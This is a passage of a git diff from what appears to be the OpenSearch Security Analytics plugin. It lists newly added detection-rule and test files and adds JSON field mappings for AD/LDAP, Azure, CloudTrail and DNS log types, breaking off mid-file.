bin/main/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_rdp_registry_modification.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_rdp_settings_hijack.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_set_servicedll.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_susp_run_key_img_folder.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_susp_service_installed.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_taskcache_entry.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_timeproviders_dllname.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_uac_bypass_wmp.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_vbs_payload_stored.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml create mode 100644 bin/main/rules/windows/registry/registry_set/registry_set_winlogon_notify_key.yml create mode 100644 bin/main/rules/windows/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml create mode 100644 bin/main/rules/windows/sysmon/sysmon_config_modification.yml create mode 100644 bin/main/rules/windows/sysmon/sysmon_config_modification_error.yml create mode 100644 bin/main/rules/windows/sysmon/sysmon_config_modification_status.yml create mode 100644 bin/main/rules/windows/sysmon/sysmon_dcom_iertutil_dll_hijack.yml create mode 100644 bin/main/rules/windows/sysmon/sysmon_process_hollowing.yml create mode 100644 bin/main/rules/windows/wmi_event/sysmon_wmi_event_subscription.yml create mode 100644 bin/main/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml create mode 100644 bin/main/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml create mode 100644 bin/main/threatIntelFeed/feedMetadata.json create mode 100644 bin/main/threatIntelFeedInfo/feodo.yml create mode 100644 bin/test/OSMapping/windows/fieldmappings.yml create mode 100644 bin/test/OSMapping/windows/mappings.json create mode 100644 bin/test/ad_ldap-sample.json create mode 100644 bin/test/azure-sample.json create mode 100644 bin/test/cloudtrail-sample.json create mode 100644 bin/test/dns-sample.json create mode 100644 bin/test/org/opensearch/securityanalytics/DetectorThreatIntelIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/LogTypeServiceTests$TestPlugin.class create mode 100644 bin/test/org/opensearch/securityanalytics/LogTypeServiceTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/SecurityAnalyticsClientUtils.class create mode 100644 bin/test/org/opensearch/securityanalytics/SecurityAnalyticsPluginRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/SecurityAnalyticsRestTestCase.class create mode 100644 bin/test/org/opensearch/securityanalytics/TestHelpers$AccessRoles.class create mode 100644 bin/test/org/opensearch/securityanalytics/TestHelpers.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/AckAlertsRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/AckAlertsResponseTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/CreateIndexMappingsRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/GetDetectorActionTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/GetDetectorRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/GetIndexMappingsRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/GetIndexMappingsResponseTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/IndexDetectorActionTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/IndexDetectorRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/IndexDetectorResponseTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/UpdateIndexMappingsRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/ValidateRulesRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/action/ValidateRulesResponseTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/alerts/AlertingServiceTests$1.class create mode 100644 bin/test/org/opensearch/securityanalytics/alerts/AlertingServiceTests$2.class create mode 100644 bin/test/org/opensearch/securityanalytics/alerts/AlertingServiceTests$3.class create mode 100644 bin/test/org/opensearch/securityanalytics/alerts/AlertingServiceTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/alerts/AlertsIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/alerts/SecureAlertsRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/correlation/CorrelationEngineRestApiIT$LogIndices.class create mode 100644 bin/test/org/opensearch/securityanalytics/correlation/CorrelationEngineRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/correlation/CorrelationEngineRuleRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/correlation/LuceneEngineIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/findings/FindingDtoTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/findings/FindingIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/findings/FindingServiceTests$1.class create mode 100644 bin/test/org/opensearch/securityanalytics/findings/FindingServiceTests$2.class create mode 100644 bin/test/org/opensearch/securityanalytics/findings/FindingServiceTests$3.class create mode 100644 bin/test/org/opensearch/securityanalytics/findings/FindingServiceTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/findings/SecureFindingRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MapperRestApiIT$1.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MapperRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MapperServiceTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests$1.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests$2.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests$3.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests$4.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests$5.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests$6.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests$7.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests$8.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/MappingsTraverserTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/action/mapping/CreateIndexMappingsRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/action/mapping/GetIndexMappingsRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/action/mapping/GetIndexMappingsResponseTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/mapper/action/mapping/UpdateIndexMappingsRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/model/DetectorInputTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/model/WriteableTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/model/XContentTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/resthandler/CustomLogTypeRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/resthandler/DetectorMonitorRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/resthandler/DetectorRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/resthandler/OCSFDetectorRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/resthandler/RuleRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/resthandler/SecureDetectorRestApiIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/aggregation/AggregationBackendTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/backend/QueryBackendTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/condition/ConditionTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaAllModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaBase64ModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaBase64OffsetModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaCIDRModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaCompareModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaContainsModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaEndswithModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaModifierTests$DummyPlainModifier.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaModifierTests$DummySequenceModifier.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaModifierTests$DummyUnionModifier.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaRegularExpressionModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaStartswithModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaWideModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/modifiers/SigmaWindowsDashModifierTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/objects/SigmaDetectionItemTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/objects/SigmaDetectionTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/objects/SigmaDetectionsTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/objects/SigmaLogSourceTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/objects/SigmaRuleTagTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/objects/SigmaRuleTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/types/SigmaBoolTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/types/SigmaNullTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/types/SigmaNumberTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/types/SigmaStringTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/types/SigmaTypeFacadeTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/utils/AnyOneOfTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/rules/utils/EitherTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/threatIntel/ThreatIntelTestCase$VerifyingClient.class create mode 100644 bin/test/org/opensearch/securityanalytics/threatIntel/ThreatIntelTestCase.class create mode 100644 bin/test/org/opensearch/securityanalytics/threatIntel/action/PutTIFJobRequestTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/threatIntel/common/ThreatIntelLockServiceTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/threatIntel/integTests/TIFJobExtensionPluginIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/threatIntel/integTests/ThreatIntelJobRunnerIT.class create mode 100644 bin/test/org/opensearch/securityanalytics/threatIntel/jobscheduler/TIFJobParameterTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/util/IndexUtilsTests.class create mode 100644 bin/test/org/opensearch/securityanalytics/writable/LogTypeTests.class create mode 100644 bin/test/plugin-security.policy create mode 100644 bin/test/s3-sample.json create mode 100644 bin/test/sample.pem create mode 100644 bin/test/test-kirk.jks create mode 100644 bin/test/testMissingPath.json create mode 100644 bin/test/testMultipleAliasesWithSameName.json create mode 100644 bin/test/testValidAliasMappings.json create mode 100644 bin/test/testValidAliasMappingsSimple.json create mode 100644 bin/test/testValidAliasMappingsWithNestedType.json create mode 100644 bin/test/threatIntel/sample_csv_with_description_and_header.csv create mode 100644 bin/test/threatIntel/sample_invalid_less_than_two_fields.csv create mode 100644 bin/test/threatIntel/sample_valid.csv create mode 100644 bin/test/threatIntelFeed/feedMetadata.json create mode 100644 bin/test/waf-sample.json diff --git a/bin/main/META-INF/services/org.apache.lucene.codecs.Codec b/bin/main/META-INF/services/org.apache.lucene.codecs.Codec new file mode 100644 index 000000000..89f846a4d --- /dev/null +++ b/bin/main/META-INF/services/org.apache.lucene.codecs.Codec @@ -0,0 +1 @@ +org.opensearch.securityanalytics.correlation.index.codec.correlation950.CorrelationCodec \ No newline at end of file diff --git a/bin/main/META-INF/services/org.opensearch.jobscheduler.spi.JobSchedulerExtension b/bin/main/META-INF/services/org.opensearch.jobscheduler.spi.JobSchedulerExtension new file mode 100644 index 000000000..0ffeb24aa --- /dev/null +++ b/bin/main/META-INF/services/org.opensearch.jobscheduler.spi.JobSchedulerExtension @@ -0,0 +1 @@ +org.opensearch.securityanalytics.SecurityAnalyticsPlugin \ No newline at end of file diff --git a/bin/main/OSMapping/ad_ldap_logtype.json b/bin/main/OSMapping/ad_ldap_logtype.json new file mode 100644 index 000000000..be2dd5488 --- /dev/null +++ b/bin/main/OSMapping/ad_ldap_logtype.json @@ -0,0 +1,100 @@ +{ + "name": "ad_ldap", + "description": "AD/LDAP", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"TargetUserName", + "ecs":"azure.signinlogs.properties.user_id" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + }, + { + "raw_field":"Category", + "ecs":"azure.activitylogs.category" + }, + { + "raw_field":"OperationName", + "ecs":"azure.platformlogs.operation_name" + }, + { + "raw_field":"ModifiedProperties_NewValue", + "ecs":"modified_properties.new_value" + }, + { + "raw_field":"ResourceProviderValue", + "ecs":"azure.resource.provider" + }, + { + "raw_field":"conditionalAccessStatus", + "ecs":"azure.signinlogs.properties.conditional_access_status" + }, + { + "raw_field":"SearchFilter", + "ecs":"SearchFilter" + }, + { + "raw_field":"Operation", + "ecs":"azure.platformlogs.operation_name" + }, + { + "raw_field":"ResultType", + "ecs":"azure.platformlogs.result_type" + }, + { + "raw_field":"DeviceDetail_isCompliant", + "ecs":"azure.signinlogs.properties.device_detail.is_compliant" + }, + { + "raw_field":"ResourceDisplayName", + "ecs":"resource_display_name" + }, + { + "raw_field":"AuthenticationRequirement", + "ecs":"azure.signinlogs.properties.authentication_requirement" + }, + { + "raw_field":"TargetResources", + "ecs":"target_resources" + }, + { + "raw_field":"Workload", + "ecs":"workload" + }, + { + "raw_field":"DeviceDetail.deviceId", + "ecs":"azure.signinlogs.properties.device_detail.device_id" + }, + { + "raw_field":"OperationNameValue", + "ecs":"azure.platformlogs.operation_name" + }, + { + "raw_field":"ResourceId", + "ecs":"azure.signinlogs.properties.resource_id" + }, + { + "raw_field":"ResultDescription", + "ecs":"azure.signinlogs.result_description" + }, + { + "raw_field":"EventID", + "ecs":"EventID" + }, + { + "raw_field":"NetworkLocationDetails", + "ecs":"azure.signinlogs.properties.network_location_details" + }, + { + "raw_field":"CategoryValue", + "ecs":"azure.activitylogs.category" + }, + { + "raw_field":"ActivityDisplayName", + "ecs":"azure.auditlogs.properties.activity_display_name" + } + ] +} diff --git a/bin/main/OSMapping/apache_access_logtype.json b/bin/main/OSMapping/apache_access_logtype.json new file mode 100644 index 000000000..714fa2acb --- /dev/null +++ b/bin/main/OSMapping/apache_access_logtype.json @@ -0,0 +1,7 @@ +{ + "name": "apache_access", + "description": "Apache Access Log type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[] +} diff --git a/bin/main/OSMapping/azure_logtype.json b/bin/main/OSMapping/azure_logtype.json new file mode 100644 index 000000000..bb55dbe5f --- /dev/null +++ b/bin/main/OSMapping/azure_logtype.json @@ -0,0 +1,216 @@ +{ + "name": "azure", + "description": "Azure Log Type", + "is_builtin": true, + "ioc_fields" : [], + "mappings":[ + { + "raw_field":"Resultdescription", + "ecs":"azure.signinlogs.result_description" + }, + { + "raw_field":"eventSource", + "ecs":"eventSource" + }, + { + "raw_field":"eventName", + "ecs":"eventName" + }, + { + "raw_field":"Status", + "ecs":"azure.platformlogs.status" + }, + { + "raw_field":"LoggedByService", + "ecs":"azure.auditlogs.properties.logged_by_service" + }, + { + "raw_field":"properties_message", + "ecs":"properties_message" + }, + { + "raw_field":"status", + "ecs":"azure.platformlogs.status" + }, + { + "raw_field":"TargetUserName", + "ecs":"azure.signinlogs.properties.user_id" + }, + { + "raw_field":"creationTime", + "ecs":"timestamp" + }, + { + "raw_field":"Category", + "ecs":"azure.activitylogs.category" + }, + { + "raw_field":"OperationName", + "ecs":"azure.platformlogs.operation_name" + }, + { + "raw_field":"ModifiedProperties_NewValue", + "ecs":"modified_properties.new_value" + }, + { + "raw_field":"ResourceProviderValue", + "ecs":"azure.resource.provider" + }, + { + "raw_field":"conditionalAccessStatus", + "ecs":"azure.signinlogs.properties.conditional_access_status" + }, + { + "raw_field":"SearchFilter", + "ecs":"search_filter" + }, + { + "raw_field":"Operation", + "ecs":"azure.platformlogs.operation_name" + }, + { + "raw_field":"ResultType", + "ecs":"azure.platformlogs.result_type" + }, + { + "raw_field":"DeviceDetail_isCompliant", + "ecs":"azure.signinlogs.properties.device_detail.is_compliant" + }, + { + "raw_field":"ResourceDisplayName", + "ecs":"resource_display_name" + }, + { + "raw_field":"AuthenticationRequirement", + "ecs":"azure.signinlogs.properties.authentication_requirement" + }, + { + "raw_field":"TargetResources", + "ecs":"target_resources" + }, + { + "raw_field":"Workload", + "ecs":"Workload" + }, + { + "raw_field":"DeviceDetail_deviceId", + "ecs":"azure.signinlogs.properties.device_detail.device_id" + }, + { + "raw_field":"OperationNameValue", + "ecs":"azure.platformlogs.operation_name" + }, + { + "raw_field":"ResourceId", + "ecs":"azure.signinlogs.properties.resource_id" + }, + { + "raw_field":"ResultDescription", + "ecs":"azure.signinlogs.result_description" + }, + { + "raw_field":"EventID", + "ecs":"EventID" + }, + { + "raw_field":"NetworkLocationDetails", + "ecs":"azure.signinlogs.properties.network_location_details" + }, + { + "raw_field":"CategoryValue", + "ecs":"azure.activitylogs.category" + }, + { + "raw_field":"ActivityDisplayName", + "ecs":"azure.auditlogs.properties.activity_display_name" + }, + { + "raw_field":"Initiatedby", + "ecs":"azure.activitylogs.identity.claims_initiated_by_user.name" + }, + { + "raw_field":"Count", + "ecs":"Count" + }, + { + "raw_field":"ResourceTenantId", + "ecs":"azure.signinlogs.properties.resource_tenant_id" + }, + { + "raw_field":"failure_status_reason", + "ecs":"failure_status_reason" + }, + { + "raw_field":"AppId", + "ecs":"azure.signinlogs.properties.app_id" + }, + { + "raw_field":"properties.message", + "ecs":"properties.message" + }, + { + "raw_field":"ClientApp", + "ecs":"azure.signinlogs.properties.client_app_used" + }, + { + "raw_field":"ActivityDetails", + "ecs":"ActivityDetails" + }, + { + "raw_field":"Target", + "ecs":"Target" + }, + { + "raw_field":"DeviceDetail.trusttype", + "ecs":"azure.signinlogs.properties.device_detail.trust_type" + }, + { + "raw_field":"HomeTenantId", + "ecs":"azure.signinlogs.properties.home_tenant_id" + }, + { + "raw_field":"ConsentContext.IsAdminConsent", + "ecs":"ConsentContext.IsAdminConsent" + }, + { + "raw_field":"InitiatedBy", + "ecs":"InitiatedBy" + }, + { + "raw_field":"ActivityType", + "ecs":"azure.auditlogs.properties.activity_display_name" + }, + { + "raw_field":"operationName", + "ecs":"azure.activitylogs.operation_name" + }, + { + "raw_field":"ModifiedProperties{}.NewValue", + "ecs":"modified_properties.new_value" + }, + { + "raw_field":"userAgent", + "ecs":"user_agent.name" + }, + { + "raw_field":"RiskState", + "ecs":"azure.signinlogs.properties.risk_state" + }, + { + "raw_field":"Username", + "ecs":"azure.activitylogs.identity.claims_initiated_by_user.name" + }, + { + "raw_field":"DeviceDetail.deviceId", + "ecs":"azure.signinlogs.properties.device_detail.device_id" + }, + { + "raw_field":"DeviceDetail.isCompliant", + "ecs":"azure.signinlogs.properties.device_detail.is_compliant" + }, + { + "raw_field":"Location", + "ecs":"azure.signinlogs.properties.network_location_details" + } + ] +} diff --git a/bin/main/OSMapping/cloudtrail_logtype.json b/bin/main/OSMapping/cloudtrail_logtype.json new file mode 100644 index 000000000..8c2ea3b3a --- /dev/null +++ b/bin/main/OSMapping/cloudtrail_logtype.json @@ -0,0 +1,230 @@ +{ + "name": "cloudtrail", + "description": "Cloudtrail Log Type", + "is_builtin": true, + "ioc_fields": [ + { + "ioc": "ip", + "fields": [ + "src_endpoint.ip" + ] + } + ], + "mappings":[ + { + "raw_field":"eventName", + "ecs":"aws.cloudtrail.event_name", + "ocsf": "api.operation" + }, + { + "raw_field":"eventSource", + "ecs":"aws.cloudtrail.event_source", + "ocsf": "api.service.name" + }, + { + "raw_field":"eventVersion", + "ecs":"aws.cloudtrail.event_version", + "ocsf": "metadata.product.version" + }, + { + "raw_field":"eventID", + "ecs":"aws.cloudtrail.event_id", + "ocsf": "metadata.uid" + }, + { + "raw_field":"eventType", + "ecs":"aws.cloudtrail.event_type", + "ocsf": "unmapped.eventType" + }, + { + "raw_field":"eventCategory", + "ecs":"aws.cloudtrail.event_category", + "ocsf": "metadata.product.feature.name" + }, + { + "raw_field":"errorMessage", + "ecs":"aws.cloudtrail.error_message", + "ocsf": "api.response.message" + }, + { + "raw_field":"errorCode", + "ecs":"aws.cloudtrail.error_code", + "ocsf": "api.response.error" + }, + { + "raw_field":"apiVersion", + "ecs":"aws.cloudtrail.api_version", + "ocsf": "api.version" + }, + { + "raw_field":"awsRegion", + "ecs":"aws.cloudtrail.aws_region", + "ocsf": "cloud.region" + }, + { + "raw_field":"additionalEventData.LoginTo", + "ecs":"aws.cloudtrail.additional_event_data.loginTo", + "ocsf": "dst_endpoint.svc_name" + }, + { + "raw_field":"additionalEventData.MFAUsed", + "ecs":"aws.cloudtrail.additional_event_data.mfaUsed", + "ocsf": "mfa" + }, + { + "raw_field":"responseElements", + "ecs":"aws.cloudtrail.response_elements.text", + "ocsf": "unmapped.responseElements" + }, + { + "raw_field":"requestID", + "ecs":"aws.cloudtrail.request_id", + "ocsf": "api.request.uid" + }, + { + "raw_field":"sourceIPAddress", + "ecs":"aws.cloudtrail.source_ip_address", + "ocsf": "src_endpoint.ip" + }, + { + "raw_field":"userAgent", + "ecs":"aws.cloudtrail.user_agent", + "ocsf": "http_request.user_agent" + }, + { + "raw_field":"vpcEndpointId", + "ecs":"aws.cloudtrail.vpc_endpoint_id", + "ocsf": "src_endpoint.uid" + }, + { + "raw_field":"responseElements.pendingModifiedValues.masterUserPassword", + "ecs":"aws.cloudtrail.response_elements.pending_modified_values.master_user_password", + "ocsf": "unmapped.responseElements.pendingModifiedValues.masterUserPassword" + }, + { + "raw_field":"responseElements.publiclyAccessible", + "ecs":"aws.cloudtrail.response_elements.publicly_accessible", + "ocsf": "unmapped.responseElements.publiclyAccessible" + }, + { + "raw_field":"responseElements.ConsoleLogin", + "ecs":"aws.cloudtrail.response_elements.publicly_accessible", + "ocsf": "status_id" + }, + { + "raw_field":"requestParameters.arn", + "ecs":"aws.cloudtrail.request_parameters.arn", + "ocsf": "unmapped.requestParameters.arn" + }, + { + "raw_field":"requestParameters.attribute", + "ecs":"aws.cloudtrail.request_parameters.attribute", + "ocsf": "unmapped.requestParameters.attribute" + }, + { + "raw_field":"requestParameters.userName", + "ecs":"aws.cloudtrail.request_parameters.username", + "ocsf": "unmapped.requestParameters.userName" + }, + { + "raw_field":"requestParameters.roleArn", + "ecs":"aws.cloudtrail.request_parameters.roleArn", + "ocsf": "user.uuid" + }, + { + "raw_field":"requestParameters.roleSessionName", + "ecs":"aws.cloudtrail.request_parameters.roleSessionName", + "ocsf": "user.name" + }, + { + "raw_field":"requestParameters.containerDefinitions.command", + "ecs":"aws.cloudtrail.request_parameters.container_definitions.command", + "ocsf": "unmapped.requestParameters.containerDefinitions.command" + }, + { + "raw_field":"userIdentity.type", + "ecs":"aws.cloudtrail.user_identity.type", + "ocsf": "actor.user.type" + }, + { + "raw_field":"userIdentity.principalId", + "ecs":"aws.cloudtrail.user_identity.principalId", + "ocsf": "actor.user.uid" + }, + { + "raw_field":"userIdentity.arn", + "ecs":"aws.cloudtrail.user_identity.arn", + "ocsf": "actor.user.uuid" + }, + { + "raw_field":"userIdentity.accountId", + "ecs":"aws.cloudtrail.user_identity.accountId", + "ocsf": "actor.user.account_uid" + }, + { + "raw_field":"userIdentity.accessKeyId", + "ecs":"aws.cloudtrail.user_identity.accessKeyId", + "ocsf": "actor.user.credential_uid" + }, + { + "raw_field":"userIdentity.identityProvider", + "ecs":"aws.cloudtrail.user_identity.identityProvider", + "ocsf": "actor.idp.name" + }, + { + "raw_field":"userIdentity.userName", + "ecs":"aws.cloudtrail.user_identity.userName", + "ocsf": "actor.user.name" + }, + { + "raw_field":"userIdentity.invokedBy", + "ecs":"aws.cloudtrail.user_identity.invokedBy", + "ocsf": "actor.invoked_by" + }, + { + "raw_field":"userIdentity.sessionContext.sessionIssuer.type", + "ecs":"aws.cloudtrail.user_identity.session_context.session_issuer.type", + "ocsf": "unmapped.userIdentity.sessionContext.sessionIssuer.type" + }, + { + "raw_field":"userIdentity.sessionContext.sessionIssuer.arn", + "ecs":"aws.cloudtrail.user_identity.session_context.session_issuer.arn", + "ocsf": "actor.session.issuer" + }, + { + "raw_field":"userIdentity.sessionContext.attributes.creationDate", + "ecs":"aws.cloudtrail.user_identity.session_context.attributes.creationDate", + "ocsf": "actor.session.created_time" + }, + { + "raw_field":"userIdentity.sessionContext.attributes.mfaAuthenticated", + "ecs":"aws.cloudtrail.user_identity.session_context.attributes.mfaAuthenticated", + "ocsf": "actor.session.mfa" + }, + { + "raw_field":"userIdentity.webIdFederationData.federatedProvider", + "ecs":"aws.cloudtrail.user_identity.web_id_federation_data.federatedProvider", + "ocsf": "actor.idp.name" + }, + { + "raw_field":"resources[].ARN", + "ecs":"aws.cloudtrail.resources.ARN", + "ocsf": "resources[].uid" + }, + { + "raw_field":"resources[].accountId", + "ecs":"aws.cloudtrail.resources.account_uid", + "ocsf": "resources[].account_uid" + }, + { + "raw_field":"resources[].type", + "ecs":"aws.cloudtrail.resources.type", + "ocsf": "resources[].type" + }, + { + "raw_field":"eventTime", + "ecs":"timestamp", + "ocsf": "time" + } + ] +} diff --git a/bin/main/OSMapping/dns_logtype.json b/bin/main/OSMapping/dns_logtype.json new file mode 100644 index 000000000..ef012407f --- /dev/null +++ b/bin/main/OSMapping/dns_logtype.json @@ -0,0 +1,125 @@ +{ + "name": "dns", + "description": "DNS Log Type", + "is_builtin": true, + "ioc_fields": [ + { + "ioc": "ip", + "fields": [ + "src_endpoint.ip" + ] + } + ], + "mappings":[ + { + "raw_field":"record_type", + "ecs":"dns.answers.type", + "ocsf": "unmapped.record_type" + }, + { + "raw_field":"answers[].Type", + "ecs":"aws.route53.answers.Type", + "ocsf": "answers[].type" + }, + { + "raw_field":"answers[].Rdata", + "ecs":"aws.route53.answers.Rdata", + "ocsf": "answers[].rdata" + }, + { + "raw_field":"answers[].Class", + "ecs":"aws.route53.answers.Class", + "ocsf": "answers[].class" + }, + { + "raw_field":"query", + "ecs":"dns.question.name", + "ocsf": "unmapped.query" + }, + { + "raw_field":"query_name", + "ecs":"aws.route53.query_name", + "ocsf": "query.hostname" + }, + { + "raw_field":"parent_domain", + "ecs":"dns.question.registered_domain", + "ocsf": "unmapped.parent_domain" + }, + { + "raw_field":"version", + "ecs":"aws.route53.version", + "ocsf": "metadata.product.version" + }, + { + "raw_field":"account_id", + "ecs":"aws.route53.account_id", + "ocsf": "cloud.account_uid" + }, + { + "raw_field":"region", + "ecs":"aws.route53.region", + "ocsf": "cloud.region" + }, + { + "raw_field":"vpc_id", + "ecs":"aws.route53.vpc_id", + "ocsf": "src_endpoint.vpc_uid" + }, + { + "raw_field":"query_timestamp", + "ecs":"aws.route53.query_timestamp", + "ocsf": "time" + }, + { + "raw_field":"query_class", + "ecs":"aws.route53.query_class", + "ocsf": "query.class" + }, + { + "raw_field":"query_type", + "ecs":"aws.route53.query_type", + "ocsf": "query.type" + }, + { + "raw_field":"srcaddr", + "ecs":"aws.route53.srcaddr", + "ocsf": "src_endpoint.ip" + }, + { + "raw_field":"srcport", + "ecs":"aws.route53.srcport", + "ocsf": "src_endpoint.port" + }, + { + "raw_field":"transport", + "ecs":"aws.route53.transport", + "ocsf": "connection_info.protocol_name" + }, + { + "raw_field":"srcids.instance", + "ecs":"aws.route53.srcids.instance", + "ocsf": "src_endpoint.instance_uid" + }, + { + "raw_field":"srcids.resolver_endpoint", + "ecs":"aws.route53.srcids.resolver_endpoint", + "ocsf": "dst_endpoint.instance_uid" + }, + { + "raw_field":"srcids.resolver_network_interface", + "ecs":"aws.route53.srcids.resolver_network_interface", + "ocsf": "dst_endpoint.interface_uid" + }, + { + "raw_field":"firewall_rule_action", + "ecs":"aws.route53.srcids.firewall_rule_action", + "ocsf": "disposition_id" + }, + { + 